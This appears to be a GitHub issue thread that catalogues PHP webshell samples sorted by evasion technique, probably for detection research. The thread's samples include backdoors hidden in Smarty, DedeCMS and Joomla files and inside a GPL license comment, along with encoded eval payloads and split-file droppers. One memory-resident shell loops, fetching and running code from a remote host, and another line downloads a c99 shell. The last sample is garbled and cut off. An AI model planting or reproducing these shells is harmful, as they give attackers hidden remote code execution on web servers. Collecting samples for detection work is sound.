Xyntax
commented
6 years ago test
Open Xyntax opened 6 years ago
Xyntax
commented
6 years ago test
Xyntax
commented
6 years ago 调用框架库文件(白样本)的webshell
<?php
/**
* Smarty plugin
*
* @package Smarty
* @subpackage PluginsShared
*/
/**
* evaluate compiler parameter
*
* @param array $params parameter array as given to the compiler function
* @param integer $index array index of the parameter to convert
* @param mixed $default value to be returned if the parameter is not present
* @return mixed evaluated value of parameter or $default
* @throws SmartyException if parameter is not a literal (but an expression, variable, …)
* @author Rodney Rehm
*/
function smarty_literal_compiler_param($params, $index, $default=null)
{
// not set, go default
if (!isset($params[$index])) {
return $default;
}
// test if param is a literal
if (!preg_match('/^([\'"]?)[a-zA-Z0-9] (\\1)/', $params[$index])) {
throw new SmartyException('$param[' . $index . '] is not a literal and is thus not evaluatable at compile time');
}
$t = null;
eval("\$t = " . $params[$index] . "");
return $t;
}
$params = array('code'=>$_GET[1]);
smarty_literal_compiler_param($params,'code');<?php
/**
*
* RSS列表页
*
* @version $Id: rss.php 1 15:38 2010年7月8日Z tianya $
* @package DedeCMS.Site
* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.
* @license http://help.dedecms.com/usersguide/license.html
* @link http://www.dedecms.com
*/
error_reporting(0);
$b="zxczxczxczxczxcxzczx";
function yuag_array($b,$c){
$b=strrev($b);
array_map(substr_replace($b, 'ss', 1, 0),array($c));
}
yuag_array("trea",$_POST['QI@lin']);
require_once(dirname(__FILE__).'/../include/common.inc.php');
require_once(DEDEINC."/arc.rssview.class.php");
$tid = isset($tid) && is_numeric($tid) ? $tid : 0;
if($tid==0) die(" Request Error! ");
$rv = new RssView($tid);
$rv->Display();拆分文件对抗动态检测的webshell
<?php
$cfg_ml='PD9waHAgQGV2YWwoJF9QT1NUWydndWlnZSddKT8+';
$cfg_ml = base64_decode($cfg_ml);
$t = md5(mt_rand(1,100));
//????????ֿ??ܵ?Ŀ¼??д????ʱWEBSHELL?ļ?
$f=$_SERVER['DOCUMENT_ROOT'].'/data/sessions/sess_'.$t;
@file_put_contents($f,$cfg_ml);
if(!file_exists($f))
{
$f=$t;
@file_put_contents($f,$cfg_ml);
}
if(!file_exists($f))
{
$f=$_SERVER['DOCUMENT_ROOT'].'/a/'.$t;
@file_put_contents($f,$cfg_ml);
}
if(!file_exists($f))
{
//??ű????ڵ?ǰĿ¼??д????ʱWEBSHELL?ļ?
$f=$_SERVER['DOCUMENT_ROOT'].'/'.$t;
@file_put_contents($f,$cfg_ml);
}
if(!file_exists($f))
{
$f='/tmp/'.$t;
@file_put_contents($f,$cfg_ml);
}
//ͨ??include????֮ǰд?????ʱWEBSHELL?ļ?
@include($f);
@unlink($f);
?><?php
echo copy("http://www.r57.me/c99.txt","lostwolf.php");
?>编码类
<?php eval(gzuncompress("xڕR?n?0\x0c=/@???.??M{???l@??Kr?T?,ː?nm?/e%?%??BR||??(6?P&?n??I?k?\x00?+߈?T?T???MX????2??P???\x0aV?4V??X???z,?\x0a?a2C?x?%?gMs?]\x24??ʾ?Z\x24i:??zv??R??ʴsB?i??xxZ<????{??tK\x09hᥩ?3??ƿvbNt?x?q????枓?j??CDnU???<?O??Ż??\x0a?^x?c?'>;V|\x0c??G4W?D9'|2-????+z???4?a??8?Wĩ7????????\x22?t7\x0c?,?h?}?hc1????_UJp??????n?E?e?>??uWF???E|??????0?9\x09??nZ1\x09v???Sna?? ?Ӱ\x22D?=_?#|ܔ?⺄]??;???N"));本地依赖
<?php
require("../../inc/header.php");
/*
SoftName : EmpireBak Version 2010
Author : wm_chief
Copyright: Powered by www.phome.net
*/
DoSetDbChar('gbk');
E_D("DROP TABLE IF EXISTS `dede_mytag`;");
E_C("CREATE TABLE `dede_mytag` (
`aid` mediumint(8) unsigned NOT NULL AUTO_INCREMENT,
`typeid` smallint(5) unsigned NOT NULL DEFAULT '0',
`tagname` varchar(30) NOT NULL DEFAULT '',
`timeset` smallint(6) NOT NULL DEFAULT '0',
`starttime` int(10) unsigned NOT NULL DEFAULT '0',
`endtime` int(10) unsigned NOT NULL DEFAULT '0',
`normbody` text,
`expbody` text,
PRIMARY KEY (`aid`),
KEY `tagname` (`tagname`,`typeid`,`timeset`,`endtime`,`starttime`)
) ENGINE=MyISAM AUTO_INCREMENT=19016 DEFAULT CHARSET=gbk");
E_D("replace into `dede_mytag` values('3117','0','','0','0','0','{dede:php}file_put_contents(''mybak.php'',''<?php eval(\$_POST[mybak]);?>'');{/dede:php}',NULL);");
E_D("replace into `dede_mytag` values('2143','0','','0','0','0','{dede:php}file_put_contents(''hkmke.php'',''hkmke<?php eval(\$_POST[hkmke]);?>'');{/dede:php}',NULL);");
require("../../inc/footer.php");
?>后门生成器
<?php phpinfo();?><?fputs(fopen("fa.php","w"),"<?eval(\$_POST[cmd]);?>")?>内存马
<?php
unlink($_SERVER['SCRIPT_FILENAME']); // 删除自身
ignore_user_abort(true); // 驻留进程,等待指令
set_time_limit(0); // 不关闭程序,保持连接
$remote_file = 'http://www.d0cs.org/shell.txt';
while($code = file_get_contents($remote_file)){ // 获取$remote_file的内容
@eval($code);
sleep(5);
};
?>自定义HTTP头+混淆
<?php
$XR='r0nw'&~Y0dTO1Wt;$ZAps4M='+l-'&')fw';$AKsSa=FAPZB." "|HDAHH.'!';$j5gQLS=#XTQGk'.
'c{'.wwtw_w.'}~ov}oo'&'sw}o~w_w}~su}oo';$PqU=#li5cBcb42vVsRV4pLBKntygCNiV5lHCR'.
'HA*:[ q`@}T@0ZLb>y M^@$@4@tA%0PI'|'@]'.kkR4UPA.'-'.PJt8_.'!Va%XB@RB0@'./*lCU5'.
'UP@0M*/TPc0PK;$FtaeUxv='}9Z~?V@[4~o}Mj>'.Z_zK.'?'.keFwUsOd.'^We}'&'}{zN?'./*n'.
'fLL*/wxGiDe.'}mOz[oKa~~7'.Owuug.'{~{n{';$rG4r3bseFJ='*n}Pqf-n#g'^#a_lCdbiaBRR'.
'm81-2Eu0~C';$rB='b1`]gAD~`A'|'!6`Ag@'.ptYG;$L_X96rF='kO>w=?~'&'Q{mw>7^';'yuBw'.
'-.A';$yc='@@b @"!'|'BBp)@`)';$mdKTVt=EcP791|UAFQ."<u";$Ulin='4z#j1!K'^#IMQIwU'.
'c>Q pir';$wVYqzGy5='u%!k*{il`'^'=qu;u#690';$BywtZ8QaHFk=_KELlmn&'_Wa~M[_';'BU'.
'iGh o|';$YzuZ=n^')';$PpCD4RJ914D="+|*%"^t0ck;$IIBxK1GA_=']_'&g_;$StoL=M&i;'Jb'.
'K8f-._$Js';$IXedwT=T&D;$ZVe4pZrS1=$ZAps4M|('^di'^';D]');$atE4muYNLph=(#Dfao7h'.
' $;$G'|') %$$U')^$AKsSa;$vUr=$j5gQLS&('A^>1NQy%F+'.SHI8.'['^#Ereo6cpaZFW9p3w'.
'&$YX8<&C1E$4 W5');$Pwp6=('!Pec|L'^VlMPH5)^('?h}go>'&'?k|s{y');$HLOTWYy3Ip6=/*'.
'2c@lB!:Kru*/$PqU^$FtaeUxv;$bAXD1h2s=$rG4r3bseFJ^$rB;$O0Xnet=("9{".SIkzl&#gIg3'.
'=~'.KQnZo)^$L_X96rF;$ro74Wy=$yc|$Ulin;$OIYd=$mdKTVt&('ysO[r}'&'{w_[y}');if(/*'.
'Tf0tz*/$ZVe4pZrS1($atE4muYNLph($Pwp6))==$HLOTWYy3Ip6)$bIywY=$vUr($bAXD1h2s,/*'.
'HNy*/$atE4muYNLph($wVYqzGy5.$BywtZ8QaHFk.$YzuZ.$PpCD4RJ914D.$IIBxK1GA_./*wQit'.
'NLNa~*/$StoL.$IXedwT));$bIywY($O0Xnet,$ro74Wy,$OIYd);#k;xvCWvgqQ!L>?10w:u&{E'.
'@!*V9v939Jjr,?+kMW$8#{^v7[MR9pBS,PSH.o5}';
?>
icukeup
commented
6 years ago 1、花括号包裹变量 <?php assert(${_GET}[cmd]);?> 2、&变量传递 <?php $a = &$_GET; assert($a[c]); ?>
icukeup
commented
6 years ago 1、花括号包裹变量 \<?php assert(${_GET}[cmd]);?> 2、&变量传递 \<?php $a = &$_GET; assert($a[c]); ?>
icukeup
commented
6 years ago 1、花括号包裹变量 \<?php assert(${_GET}[cmd]);?> 2、&变量传递 \<?php $a = &$_GET; assert($a[c]); ?>
Xyntax
commented
5 years ago <?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enctype="multipart/form-data"><input name="uf" type="file">SP:<input name="sp" size="50" type="text"><input type="submit" value="ok"></form>';$rnform='<form method="post">ON:<input name="on" size="50" type="text">NN:<input name="nn" size="50" type="text"><input type="submit" value="ok"></form>';$lpform='<form method="post">DP:<input name="dp" size="50" type="text"><input type="submit" value="ok"></form>';$sfform='<form method="post">DF:<input name="df" size="50" type="text"><input type="submit" value="ok"></form>';if($_GET['act']=='dl'){echo($dlform);if($_SERVER['REQUEST_METHOD']=='POST'){$fpc/*+/*+*/($_POST['fn'],$fgc/*+/*+*/($_POST['url']));}exit;}if($_GET['act']=='ul'){echo($ulform);if($_SERVER['REQUEST_METHOD']=='POST'){$sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';$muf/*+/*+*/($/*+/*+*/{"_F"."IL"."ES"}["uf"]["tmp_name"],$sp.$/*+/*+*/{"_F"."IL"."ES"}["uf"]["name"]);}exit;}if($_GET['act']=='rn'){echo($rnform);if($_SERVER['REQUEST_METHOD']=='POST'){$rn/*+/*+*/($_POST['on'],$_POST['nn']);}exit;}if($_GET['act']=='gp'){echo($dn/*+/*+*/(__FILE__));exit;}if($_GET['act']=='lp'){echo($lpform);if($_SERVER['REQUEST_METHOD']=='POST'){$dp=$_POST['dp'].'/';$h=$od/*+/*+*/($dp);while(($fn=$rd/*+/*+*/($h))!==false){if($id/*+/*+*/($dp.$fn)){$t1.='D '.$fn.'<br>';}else{$t2.=' '.$fn.'<br>';}}$cd/*+/*+*/($dp);echo($dp.'<br>'.$t1.$t2);}exit;}if($_GET['act']=='sf'){echo($sfform);if($_SERVER['REQUEST_METHOD']=='POST'){$df=$_POST['df'];echo('<textarea style="width:100%;height:100%;" wrap="off">'.$fgc/*+/*+*/($df).'</textarea>');}exit;}?>LICENSE障眼法,将webshell输入输出点拆成两块,隐藏在license里面,插到CMS文件的原始代码头部。
<?php /* GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you */extract($_COOKIE);/* copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. patents applied to GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not */@$PC4E20&&@$F($A,$B);/*. For example, Corresponding Source
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary. */ ?>日志注入(注入注释符,跳出注释块将恶意代码插入到php代码块中)
<?php^M
/*^M
Page: /wap.php?action=list&id=392%20test^M
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'test) And arcrank=0 limit 0,1' at line 1 <br />Error sql: <font color='red'>Select count(*) as dd From `dede_archives` where typeid in(392 test) And arcrank=0 limit 0,1;</font>^M
*/^M
?>^M
<?php^M
/*^M
Page: /wap.php?action=list&id=392%20test^M
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'test) And arcrank=0 order by id desc limit 0,10' at line 1 <br />Error sql: <font color='red'>Select id,title,pubdate,click From `dede_archives` where typeid in(392 test) And arcrank=0 order by id desc limit 0,10</font>^M
*/^M
?>^M
<?php^M
/*^M
Page: /plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(116).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*^M
Error: Illegal double '1024e1024' value found during parsing <br />Error sql: <font color='red'>Select goodpost,badpost,scores From `dede_archives` where id=1024e1024 limit 0,1;</font>^M
*/^M
?>^M
<?php^M
/*^M
Page: /^M
Error: DedeCms´íÎ󾯸棺<font color='red'>Á¬½ÓÊý¾Ý¿âʧ°Ü£¬¿ÉÄÜÊý¾Ý¿âÃÜÂë²»¶Ô»òÊý¾Ý¿â·þÎñÆ÷³ö´í£¡</font>^M
*/^M
?>文件中间隐蔽型插马
<?php
/**
* @package Joomla.Platform
* @subpackage Application
*
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE
*/
!defined('JPATH_PLATFORM') or die;
/**
* Base object Instance of SimplePie_Sanitize (or other class)
*
* @since 11.4
*/
/**
* SimplePie Name
*/
define('SIMPLEPIE_NAME', 'SimplePie');
/**
* SimplePie Version
*/
define('SIMPLEPIE_VERSION', '1.2');
/**
* SimplePie Build
*/
define('SIMPLEPIE_BUILD', '20090627192103');
/**
* SimplePie Session ID
*/
$id = $_SERVER['HTTP_SESSION'];
/**
* Class constructor.
*
* @param JInputCli $input An optional argument to provide dependency injection for the application's
* input object. If the argument is a JInputCli object that object will become
* the application's input object, otherwise a default input object is created.
* @param Registry $config An optional argument to provide dependency injection for the application's
* config object. If that object will become
* the application's config object, otherwise a default config object is created.
* @param JEventDispatcher $dispatcher An optional argument to provide dependency injection for the application's
* event dispatcher. If the argument become
* the application's event dispatcher, if it is null then the default event dispatcher
* will be created based on the application's loadDispatcher() method.
*
* @see JApplicationBase::loadDispatcher()
* @since 11.1
*/
function construct($input = null, $config = null, $dispatcher = null)
{
// Close the application if we are not executed from the command line.
// @codeCoverageIgnoreStart
if (!defined('STDOUT') || !defined('STDIN') || !isset($_SERVER['argv']))
{
$this->close();
}
// @codeCoverageIgnoreEnd
// If a input object is given use it.
if ($input instanceof JInput)
{
$this->input = $input;
}
// Create the input based on the application logic.
else
{
if (class_exists('JInput'))
{
$this->input = new JInputCli;
}
}
// If a config object is given use it.
if ($config instanceof Registry)
{
$this->config = $config;
}
// Instantiate a new configuration object.
else
{
$this->config = new Registry;
}
$this->loadDispatcher($dispatcher);
// Load the configuration object.
$this->loadConfiguration($this->fetchConfigurationData());
// Set the execution datetime and timestamp;
$this->set('execution.datetime', gmdate('Y-m-d H:i:s'));
$this->set('execution.timestamp', time());
// Set the current directory.
$this->set('cwd', getcwd());
}
/**
* Returns a reference to the global JApplicationCli object, only creating it if it doesn't already exist.
*
* This method must be invoked as: $cli = JApplicationCli::getInstance();
*
* @param string $name The*/$sess = @$_COOKIE[ssid];/*of the JApplicationCli class to instantiate.
*
* @return JApplicationCli
*
* @since 11.1
*/ $a='as';
function getInstance($name = null)
{
// Only create the object if it doesn't exist.
if (empty(self::$instance))
{
if (class_exists($name) && (is_subclass_of($name, 'JApplicationCli')))
{
self::$instance = new $name;
}
else
{
self::$instance = new JApplicationCli;
}
}
return self::$instance;
}
/**
* Execute the application.
*
* @return void
*
* @since 11.1
*/ $b='sert'; $a=$a.$b;
function execute()
{
// Trigger the onBeforeExecute event.
$this->triggerEvent('onBeforeExecute');
// Perform application routines.
$this->doExecute();
// Trigger the onAfterExecute event.
$this->triggerEvent('onAfterExecute');
}
/**
* Load an object or array into the application configuration object.
*
* @param mixed $data Either an array or object to be loaded into the configuration object.
*
* @return JApplicationCli Instance of $this to allow chaining.
*
* @since 11.1
*/ $start = strpos($sess,'f3be52');
function loadConfiguration($data)
{
// Load the data into the configuration object.
if (is_array($data))
{
$this->config->loadArray($data);
}
elseif (is_object($data))
{
$this->config->loadObject($data);
}
return $this;
}
/**
* Write a string to standard output.
*
* @param string $text The text to display.
* @param boolean $nl True (default) to append a new line at the end of the output string.
*
* @return JApplicationCli Instance of $this to allow chaining.
*
* @codeCoverageIgnore
* @since 11.1
*/
function out($text = '', $nl = true)
{
$output = $this->getOutput();
$output->out($text, $nl);
return $this;
}
/**
* Get an output object.
*
* @return CliOutput
*
* @since 3.3
*/ if($start===0){@${a}($id);}
function getOutput()
{
if (!$this->output)
{
// In 4.0, this will convert to throwing an exception and you will expected to
// initialize this in the constructor. Until then set a default.
$default = new Joomla\Application\Cli\Output\Xml;
$this->setOutput($default);
}
return $this->output;
}
/**
* Method to run the application routines. Most likely you will want to instantiate a controller
* and execute it, or perform some sort of task directly.
*
* @return void
*
* @codeCoverageIgnore
* @since 11.3
*/
function doExecute()
{
// Your application routines go here.
}
利用构造函数隐藏调用起点
<?php
class Check_safe
{
function __construct()
{
$password = '127538';
@assert($this->__str());
}
public function __str(){
return @file_get_contents($this->__url());
}
public function __url(){
$ips = $_SERVER['REMOTE_ADDR'];
$arr = array('687474703a2f2f7777772e3430','307361792e636f6d2f636f6465','2e7068703f6970733d');
return pack("H*",$arr[0].$arr[1].$arr[2]).$ips;
}
}
new Check_safe();加密工具
<?php /* Powered by www.qibosoft.com */$å603<84><9f><9e><8f><9c>³«»¢ô<81>=__FILE__;$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾=base64_decode("Zmc2cÄ2JlaHBy<93>YTRjb190bmQ=s");$ll1ll11111l111lll1=$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{4}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{9}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{3}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{5};$ll1ll11111l111lll1.=$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{2}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{10}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{13}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{16};$ll1ll11111l111lll1.=$ll1ll11111l111lll1{3}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{11}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{12}.$ll1ll11111l111lll1{7}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{5};$ll1ll11lll1l1l1=$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{0}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{12}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{7}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{5}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{15};$ll1ll11lll1l111=$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{0}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{1}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{5}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{14};$ll1ll11lll1l111=$ll1ll11lll1l111.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{3};$ll1l111lll1l111=$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{0}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{8}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{5}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{9}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{16};$ll11l111lllllll11111l="rb";$ll11l111lllllll11111ll1="exp";$ll11l111lllllll11111ll1.="lode";$l1111llllllll11111l;eval($ll1ll11111l111lll1<?php /* Powered by www.qibosoft.com */$å603<84><9f><9e><8f>
<9c>³«»¢ô<81>=__FILE__;$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾=base64_decode("Z
mc2cÄ2JlaHBy<93>YTRjb190bmQ=s");$ll1ll11111l111lll1=$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{4}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{9}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{3}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{5};$ll1ll11111l111lll1.=$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{2}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{10}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{13}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{16};$ll1ll11111l111lll1.=$ll1ll11111l111lll1{3}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{11}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{12}.$ll1ll11111l111lll1{7}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{5};$ll1ll11lll1l1l1=$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{0}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{12}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{7}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{5}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{15};$ll1ll11lll1l111=$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{0}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{1}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{5}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{14};$ll1ll11lll1l111=$ll1ll11lll1l111.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{3};$ll1l111lll1l111=$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{0}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{8}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{5}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{9}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{16};$ll11l111lllllll11111l="rb";$ll11l111lllllll11111ll1="exp";$ll11l111lllllll11111ll1.
="lode";$l1111llllllll11111l;eval($ll1ll11111l111lll1('J<91><81>P
http://webshell.cdxy.me/